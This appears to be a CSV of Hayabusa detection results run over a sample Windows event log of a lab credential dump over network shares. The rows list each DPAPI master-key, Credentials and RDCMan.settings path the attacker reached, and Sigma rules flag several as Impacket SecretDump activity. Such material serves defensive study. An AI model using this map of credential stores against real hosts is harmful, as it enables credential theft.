2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.632 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.648 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.680 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.732 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.763 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.794 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.826 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.841 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.889 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.905 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.956 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
